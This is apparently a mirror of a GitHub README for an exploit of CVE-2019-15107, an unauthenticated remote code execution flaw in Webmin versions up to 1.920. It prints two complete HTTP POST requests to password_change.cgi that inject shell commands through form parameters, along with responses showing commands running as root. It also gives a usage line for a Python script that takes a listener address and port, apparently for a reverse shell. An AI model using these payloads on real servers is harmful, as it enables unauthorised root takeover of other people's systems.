Giters

ruthvikvegunta / CVE-2019-15107

Webmin <=1.920 RCE

Home Page:https://github.com/ruthvikvegunta/CVE-2019-15107

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

exploithackingpythonrcewebmin

CVE-2019-15107 Webmin RCE <=1.920 (unauthenticated)

1.  Webmin <=1.920
2.  Needs reset Password function to be enabled

v1.890 POC

POST /password_change.cgi HTTP/1.1
Host: 10.11.1.88:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: http://10.11.1.88:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

expired=id

<h1>Error - Perl execution Failed</h1>
<p>Your password has expired, and a new one must be chosen.uid=0(root) gid=0(root) groups=0(root)
</p>

<=v1.920 & !=v1.890 POC

POST /password_change.cgi HTTP/1.1
Host: 10.11.1.88:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: http://10.11.1.88:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=root&pam=&expired=2&old=vrvik|id&new1=vrvik&new2=vrvik


<div class="panel-body">
<hr>
<center><h3>Failed to change password : The current password is incorrectuid=0(root) gid=0(root) groups=0(root)
</h3></center>

Script Usage:

Tested on v1.890, but should also work for other webmin versions in which this backdoor is installed.

python3 webmin_rce.py -t http://10.11.1.88:10000 -l 172.16.1.3 -p 8888

About

Webmin <=1.920 RCE

https://github.com/ruthvikvegunta/CVE-2019-15107

exploithackingpythonrcewebmin

License:GNU General Public License v3.0

Languages

Language:Python 100.0%